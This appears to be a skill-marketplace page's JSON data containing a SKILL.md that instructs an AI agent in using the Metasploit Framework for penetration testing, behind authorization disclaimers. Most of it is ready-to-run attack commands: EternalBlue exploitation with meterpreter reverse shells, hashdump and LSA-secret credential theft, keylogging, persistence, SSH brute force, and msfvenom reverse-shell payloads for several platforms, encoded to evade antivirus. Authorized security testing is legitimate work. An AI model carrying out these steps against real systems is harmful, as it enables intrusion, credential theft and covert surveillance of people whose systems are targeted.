[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"skill-301f7292-8fa3-4a9b-958e-a88d72c39771":3,"$fGNDsD9O6rG2G2l3q-VEVC9q18yMNxZRmSicpI_JbnHI":43},{"id":4,"title":5,"description":6,"categoryId":7,"moduleId":8,"tags":9,"prompt":10,"icon":11,"source":12,"sourceUrl":13,"authorId":14,"authorName":15,"isPublic":16,"stars":17,"runs":18,"createdAt":19,"updatedAt":19,"module":20,"category":27,"packages":34},"301f7292-8fa3-4a9b-958e-a88d72c39771","metasploit-framework","⚠️ 仅限授权使用 > 此技能仅用于教育目的或授权安全评估。 > 在使用此工具之前，您必须获得系统所有者的明确书面许可。 > 滥用此工具是非法的，严格禁止。","cat_life_career","mod_other","sickn33,other","---\nname: metasploit-framework\ndescription: \"⚠️ AUTHORIZED USE ONLY > This skill is for educational purposes or authorized security assessments only. > You must have explicit, written permission from the system owner before using this tool. > Misuse of this tool is illegal and strictly prohibited.\"\nrisk: offensive\nsource: community\nauthor: zebbern\ndate_added: \"2026-02-27\"\n---\n\n# Metasploit Framework\n\n> **⚠️ AUTHORIZED USE ONLY**\n> This skill is for educational purposes or authorized security assessments only.\n> You must have explicit, written permission from the system owner before using this tool.\n> Misuse of this tool is illegal and strictly prohibited.\n\n## Purpose\n\nLeverage the Metasploit Framework for comprehensive penetration testing, from initial exploitation through post-exploitation activities. Metasploit provides a unified platform for vulnerability exploitation, payload generation, auxiliary scanning, and maintaining access to compromised systems during authorized security assessments.\n\n## Prerequisites\n\n### Required Tools\n```bash\n# Metasploit must already be installed before using this skill.\n# Kali Linux usually ships with it preinstalled.\nmsfconsole --version\n```\n\nInstallation varies by operating system and package source. Follow your platform's documented package-manager or vendor installation process before using this skill. Do not rely on an unpinned remote installer script from inside this skill.\n\nIf you want database-backed features such as workspace tracking, initialize `msfdb` using the instructions for your local installation. This skill assumes Metasploit is already available and does not require `sudo`, `systemctl`, or other privileged host-level setup steps.\n\n### Required Knowledge\n- Network and system fundamentals\n- Understanding of vulnerabilities and exploits\n- Basic programming concepts\n- Target enumeration techniques\n\n### Required Access\n- Written authorization for testing\n- Network access to target systems\n- Understanding of scope and rules of engagement\n\nBefore running exploit modules, ask the user to confirm the exact target host, scope, and authorization state.\n\n## Outputs and Deliverables\n\n1. **Exploitation Evidence** - Screenshots and logs of successful compromises\n2. **Session Logs** - Command history and extracted data\n3. **Vulnerability Mapping** - Exploited vulnerabilities with CVE references\n4. **Post-Exploitation Artifacts** - Credentials, files, and system information\n\n## Core Workflow\n\n### Phase 1: MSFConsole Basics\n\nLaunch and navigate the Metasploit console:\n\n```bash\n# Start msfconsole\nmsfconsole\n\n# Quiet mode (skip banner)\nmsfconsole -q\n\n# Basic navigation commands\nmsf6 > help                    # Show all commands\nmsf6 > search [term]           # Search modules\nmsf6 > use [module]            # Select module\nmsf6 > info                    # Show module details\nmsf6 > show options            # Display required options\nmsf6 > set [OPTION] [value]    # Configure option\nmsf6 > run \u002F exploit           # Execute module\nmsf6 > back                    # Return to main console\nmsf6 > exit                    # Exit msfconsole\n```\n\n### Phase 2: Module Types\n\nUnderstand the different module categories:\n\n```bash\n# 1. Exploit Modules - Target specific vulnerabilities\nmsf6 > show exploits\nmsf6 > use exploit\u002Fwindows\u002Fsmb\u002Fms17_010_eternalblue\n\n# 2. Payload Modules - Code executed after exploitation\nmsf6 > show payloads\nmsf6 > set PAYLOAD windows\u002Fx64\u002Fmeterpreter\u002Freverse_tcp\n\n# 3. Auxiliary Modules - Scanning, fuzzing, enumeration\nmsf6 > show auxiliary\nmsf6 > use auxiliary\u002Fscanner\u002Fsmb\u002Fsmb_version\n\n# 4. Post-Exploitation Modules - Actions after compromise\nmsf6 > show post\nmsf6 > use post\u002Fwindows\u002Fgather\u002Fhashdump\n\n# 5. Encoders - Obfuscate payloads\nmsf6 > show encoders\nmsf6 > set ENCODER x86\u002Fshikata_ga_nai\n\n# 6. Nops - No-operation padding for buffer overflows\nmsf6 > show nops\n\n# 7. Evasion - Bypass security controls\nmsf6 > show evasion\n```\n\n### Phase 3: Searching for Modules\n\nFind appropriate modules for targets:\n\n```bash\n# Search by name\nmsf6 > search eternalblue\n\n# Search by CVE\nmsf6 > search cve:2017-0144\n\n# Search by platform\nmsf6 > search platform:windows type:exploit\n\n# Search by type and keyword\nmsf6 > search type:auxiliary smb\n\n# Filter by rank (excellent, great, good, normal, average, low, manual)\nmsf6 > search rank:excellent\n\n# Combined search\nmsf6 > search type:exploit platform:linux apache\n\n# View search results columns:\n# Name, Disclosure Date, Rank, Check (if it can verify vulnerability), Description\n```\n\n### Phase 4: Configuring Exploits\n\nSet up an exploit for execution:\n\n```bash\n# Select exploit module\nmsf6 > use exploit\u002Fwindows\u002Fsmb\u002Fms17_010_eternalblue\n\n# View required options\nmsf6 exploit(windows\u002Fsmb\u002Fms17_010_eternalblue) > show options\n\n# Set target host\nmsf6 exploit(...) > set RHOSTS 192.168.1.100\n\n# Set target port (if different from default)\nmsf6 exploit(...) > set RPORT 445\n\n# View compatible payloads\nmsf6 exploit(...) > show payloads\n\n# Set payload\nmsf6 exploit(...) > set PAYLOAD windows\u002Fx64\u002Fmeterpreter\u002Freverse_tcp\n\n# Set local host for reverse connection\nmsf6 exploit(...) > set LHOST 192.168.1.50\nmsf6 exploit(...) > set LPORT 4444\n\n# View all options again to verify\nmsf6 exploit(...) > show options\n\n# Check if target is vulnerable (if supported)\nmsf6 exploit(...) > check\n\n# Execute exploit\nmsf6 exploit(...) > exploit\n# or\nmsf6 exploit(...) > run\n```\n\n### Phase 5: Payload Types\n\nSelect appropriate payload for the situation:\n\n```bash\n# Singles - Self-contained, no staging\nwindows\u002Fshell_reverse_tcp\nlinux\u002Fx86\u002Fshell_bind_tcp\n\n# Stagers - Small payload that downloads larger stage\nwindows\u002Fmeterpreter\u002Freverse_tcp\nlinux\u002Fx86\u002Fmeterpreter\u002Fbind_tcp\n\n# Stages - Downloaded by stager, provides full functionality\n# Meterpreter, VNC, shell\n\n# Payload naming convention:\n# [platform]\u002F[architecture]\u002F[payload_type]\u002F[connection_type]\n# Examples:\nwindows\u002Fx64\u002Fmeterpreter\u002Freverse_tcp\nlinux\u002Fx86\u002Fshell\u002Fbind_tcp\nphp\u002Fmeterpreter\u002Freverse_tcp\njava\u002Fmeterpreter\u002Freverse_https\nandroid\u002Fmeterpreter\u002Freverse_tcp\n```\n\n### Phase 6: Meterpreter Session\n\nWork with Meterpreter post-exploitation:\n\n```bash\n# After successful exploitation, you get Meterpreter prompt\nmeterpreter >\n\n# System Information\nmeterpreter > sysinfo\nmeterpreter > getuid\nmeterpreter > getpid\n\n# File System Operations\nmeterpreter > pwd\nmeterpreter > ls\nmeterpreter > cd C:\\\\Users\nmeterpreter > download file.txt \u002Ftmp\u002F\nmeterpreter > upload \u002Ftmp\u002Ftool.exe C:\\\\\n\n# Process Management\nmeterpreter > ps\nmeterpreter > migrate [PID]\nmeterpreter > kill [PID]\n\n# Networking\nmeterpreter > ipconfig\nmeterpreter > netstat\nmeterpreter > route\nmeterpreter > portfwd add -l 8080 -p 80 -r 10.0.0.1\n\n# Privilege Escalation\nmeterpreter > getsystem\nmeterpreter > getprivs\n\n# Credential Harvesting\nmeterpreter > hashdump\nmeterpreter > run post\u002Fwindows\u002Fgather\u002Fcredentials\u002Fcredential_collector\n\n# Screenshots and Keylogging\nmeterpreter > screenshot\nmeterpreter > keyscan_start\nmeterpreter > keyscan_dump\nmeterpreter > keyscan_stop\n\n# Shell Access\nmeterpreter > shell\nC:\\Windows\\system32> whoami\nC:\\Windows\\system32> exit\nmeterpreter >\n\n# Background Session\nmeterpreter > background\nmsf6 exploit(...) > sessions -l\nmsf6 exploit(...) > sessions -i 1\n```\n\n### Phase 7: Auxiliary Modules\n\nUse auxiliary modules for reconnaissance:\n\n```bash\n# SMB Version Scanner\nmsf6 > use auxiliary\u002Fscanner\u002Fsmb\u002Fsmb_version\nmsf6 auxiliary(scanner\u002Fsmb\u002Fsmb_version) > set RHOSTS 192.168.1.0\u002F24\nmsf6 auxiliary(...) > run\n\n# Port Scanner\nmsf6 > use auxiliary\u002Fscanner\u002Fportscan\u002Ftcp\nmsf6 auxiliary(...) > set RHOSTS 192.168.1.100\nmsf6 auxiliary(...) > set PORTS 1-1000\nmsf6 auxiliary(...) > run\n\n# SSH Version Scanner\nmsf6 > use auxiliary\u002Fscanner\u002Fssh\u002Fssh_version\nmsf6 auxiliary(...) > set RHOSTS 192.168.1.0\u002F24\nmsf6 auxiliary(...) > run\n\n# FTP Anonymous Login\nmsf6 > use auxiliary\u002Fscanner\u002Fftp\u002Fanonymous\nmsf6 auxiliary(...) > set RHOSTS 192.168.1.100\nmsf6 auxiliary(...) > run\n\n# HTTP Directory Scanner\nmsf6 > use auxiliary\u002Fscanner\u002Fhttp\u002Fdir_scanner\nmsf6 auxiliary(...) > set RHOSTS 192.168.1.100\nmsf6 auxiliary(...) > run\n\n# Brute Force Modules\nmsf6 > use auxiliary\u002Fscanner\u002Fssh\u002Fssh_login\nmsf6 auxiliary(...) > set RHOSTS 192.168.1.100\nmsf6 auxiliary(...) > set USER_FILE \u002Fusr\u002Fshare\u002Fwordlists\u002Fusers.txt\nmsf6 auxiliary(...) > set PASS_FILE \u002Fusr\u002Fshare\u002Fwordlists\u002Frockyou.txt\nmsf6 auxiliary(...) > run\n```\n\n### Phase 8: Post-Exploitation Modules\n\nRun post modules on active sessions:\n\n```bash\n# List sessions\nmsf6 > sessions -l\n\n# Run post module on specific session\nmsf6 > use post\u002Fwindows\u002Fgather\u002Fhashdump\nmsf6 post(windows\u002Fgather\u002Fhashdump) > set SESSION 1\nmsf6 post(...) > run\n\n# Or run directly from Meterpreter\nmeterpreter > run post\u002Fwindows\u002Fgather\u002Fhashdump\n\n# Common Post Modules\n# Credential Gathering\npost\u002Fwindows\u002Fgather\u002Fcredentials\u002Fcredential_collector\npost\u002Fwindows\u002Fgather\u002Flsa_secrets\npost\u002Fwindows\u002Fgather\u002Fcachedump\npost\u002Fmulti\u002Fgather\u002Fssh_creds\n\n# System Enumeration\npost\u002Fwindows\u002Fgather\u002Fenum_applications\npost\u002Fwindows\u002Fgather\u002Fenum_logged_on_users\npost\u002Fwindows\u002Fgather\u002Fenum_shares\npost\u002Flinux\u002Fgather\u002Fenum_configs\n\n# Privilege Escalation\npost\u002Fwindows\u002Fescalate\u002Fgetsystem\npost\u002Fmulti\u002Frecon\u002Flocal_exploit_suggester\n\n# Persistence\npost\u002Fwindows\u002Fmanage\u002Fpersistence_exe\npost\u002Flinux\u002Fmanage\u002Fsshkey_persistence\n\n# Pivoting\npost\u002Fmulti\u002Fmanage\u002Fautoroute\n```\n\n### Phase 9: Payload Generation with msfvenom\n\nCreate standalone payloads:\n\n```bash\n# Basic Windows reverse shell\nmsfvenom -p windows\u002Fx64\u002Fmeterpreter\u002Freverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o shell.exe\n\n# Linux reverse shell\nmsfvenom -p linux\u002Fx86\u002Fmeterpreter\u002Freverse_tcp LHOST=192.168.1.50 LPORT=4444 -f elf -o shell.elf\n\n# PHP reverse shell\nmsfvenom -p php\u002Fmeterpreter\u002Freverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw -o shell.php\n\n# Python reverse shell\nmsfvenom -p python\u002Fmeterpreter\u002Freverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw -o shell.py\n\n# PowerShell payload\nmsfvenom -p windows\u002Fx64\u002Fmeterpreter\u002Freverse_tcp LHOST=192.168.1.50 LPORT=4444 -f psh -o shell.ps1\n\n# ASP web shell\nmsfvenom -p windows\u002Fmeterpreter\u002Freverse_tcp LHOST=192.168.1.50 LPORT=4444 -f asp -o shell.asp\n\n# WAR file (Tomcat)\nmsfvenom -p java\u002Fmeterpreter\u002Freverse_tcp LHOST=192.168.1.50 LPORT=4444 -f war -o shell.war\n\n# Android APK\nmsfvenom -p android\u002Fmeterpreter\u002Freverse_tcp LHOST=192.168.1.50 LPORT=4444 -o shell.apk\n\n# Encoded payload (evade AV)\nmsfvenom -p windows\u002Fmeterpreter\u002Freverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86\u002Fshikata_ga_nai -i 5 -f exe -o encoded.exe\n\n# List available formats\nmsfvenom --list formats\n\n# List available encoders\nmsfvenom --list encoders\n```\n\n### Phase 10: Setting Up Handlers\n\nConfigure listener for incoming connections:\n\n```bash\n# Manual handler setup\nmsf6 > use exploit\u002Fmulti\u002Fhandler\nmsf6 exploit(multi\u002Fhandler) > set PAYLOAD windows\u002Fx64\u002Fmeterpreter\u002Freverse_tcp\nmsf6 exploit(multi\u002Fhandler) > set LHOST 192.168.1.50\nmsf6 exploit(multi\u002Fhandler) > set LPORT 4444\nmsf6 exploit(multi\u002Fhandler) > exploit -j\n\n# The -j flag runs as background job\nmsf6 > jobs -l\n\n# When payload executes on target, session opens\n[*] Meterpreter session 1 opened\n\n# Interact with session\nmsf6 > sessions -i 1\n```\n\n## Quick Reference\n\n### Essential MSFConsole Commands\n\n| Command | Description |\n|---------|-------------|\n| `search [term]` | Search for modules |\n| `use [module]` | Select a module |\n| `info` | Display module information |\n| `show options` | Show configurable options |\n| `set [OPT] [val]` | Set option value |\n| `setg [OPT] [val]` | Set global option |\n| `run` \u002F `exploit` | Execute module |\n| `check` | Verify target vulnerability |\n| `back` | Deselect module |\n| `sessions -l` | List active sessions |\n| `sessions -i [N]` | Interact with session |\n| `jobs -l` | List background jobs |\n| `db_nmap` | Run nmap with database |\n\n### Meterpreter Essential Commands\n\n| Command | Description |\n|---------|-------------|\n| `sysinfo` | System information |\n| `getuid` | Current user |\n| `getsystem` | Attempt privilege escalation |\n| `hashdump` | Dump password hashes |\n| `shell` | Drop to system shell |\n| `upload\u002Fdownload` | File transfer |\n| `screenshot` | Capture screen |\n| `keyscan_start` | Start keylogger |\n| `migrate [PID]` | Move to another process |\n| `background` | Background session |\n| `portfwd` | Port forwarding |\n\n### Common Exploit Modules\n\n```bash\n# Windows\nexploit\u002Fwindows\u002Fsmb\u002Fms17_010_eternalblue\nexploit\u002Fwindows\u002Fsmb\u002Fms08_067_netapi\nexploit\u002Fwindows\u002Fhttp\u002Fiis_webdav_upload_asp\nexploit\u002Fwindows\u002Flocal\u002Fbypassuac\n\n# Linux\nexploit\u002Flinux\u002Fssh\u002Fsshexec\nexploit\u002Flinux\u002Flocal\u002Foverlayfs_priv_esc\nexploit\u002Fmulti\u002Fhttp\u002Fapache_mod_cgi_bash_env_exec\n\n# Web Applications\nexploit\u002Fmulti\u002Fhttp\u002Ftomcat_mgr_upload\nexploit\u002Funix\u002Fwebapp\u002Fwp_admin_shell_upload\nexploit\u002Fmulti\u002Fhttp\u002Fjenkins_script_console\n```\n\n## Constraints and Limitations\n\n### Legal Requirements\n- Only use on systems you own or have written authorization to test\n- Document all testing activities\n- Follow rules of engagement\n- Report all findings to appropriate parties\n\n### Technical Limitations\n- Modern AV\u002FEDR may detect Metasploit payloads\n- Some exploits require specific target configurations\n- Firewall rules may block reverse connections\n- Not all exploits work on all target versions\n\n### Operational Security\n- Use encrypted channels (reverse_https) when possible\n- Clean up artifacts after testing\n- Avoid detection by monitoring systems\n- Limit post-exploitation to agreed scope\n\n## Troubleshooting\n\n| Issue | Solutions |\n|-------|-----------|\n| Database not connected | Run `sudo msfdb init`, start PostgreSQL, then `db_connect` |\n| Exploit fails\u002Fno session | Run `check`; verify payload architecture; check firewall; try different payloads |\n| Session dies immediately | Migrate to stable process; use stageless payload; check AV; use AutoRunScript |\n| Payload detected by AV | Use encoding `-e x86\u002Fshikata_ga_nai -i 10`; use evasion modules; custom templates |\n\n## When to Use\nThis skill is applicable to execute the workflow or actions described in the overview.\n","","imported","https:\u002F\u002Fgithub.com\u002Fsickn33\u002Fantigravity-awesome-skills","user_system_seed","SkillOPIC",true,135,663,"2026-05-16 13:28:37",{"id":8,"name":21,"slug":22,"icon":23,"description":24,"sort":25,"createdAt":26},"其他","other","mdi-page-next-outline","其他类型Skill",5,"2026-05-16 12:53:40",{"id":7,"name":28,"slug":29,"icon":30,"description":31,"moduleId":8,"sort":32,"skillCount":33,"createdAt":26},"职场发展","career","mdi-briefcase-outline","面试准备、简历优化、职业规划",4,575,[35],{"id":36,"skillId":4,"version":37,"fileName":38,"fileSize":39,"filePath":40,"fileHash":41,"manifest":42,"createdAt":19},"4e42cd59-edd7-4a1f-8db6-8aac4b6b0274","1.0.0","metasploit-framework.zip",4865,"uploads\u002Fskills\u002F301f7292-8fa3-4a9b-958e-a88d72c39771\u002Fmetasploit-framework.zip","c2f75a5b621640c75ea918e85eb14fd6653b53494ab6d0ae8f561c7342f8a68d","[{\"path\":\"SKILL.md\",\"isDirectory\":false,\"size\":13933}]",{"code":44,"message":45,"data":46},200,"success",{"items":47,"stats":48,"page":51},[],{"averageRating":49,"totalRatings":49,"ratingCounts":50},0,[49,49,49,49,49],{"limit":52,"offset":49,"hasMore":53,"nextOffset":52,"ratedOnly":16},15,false]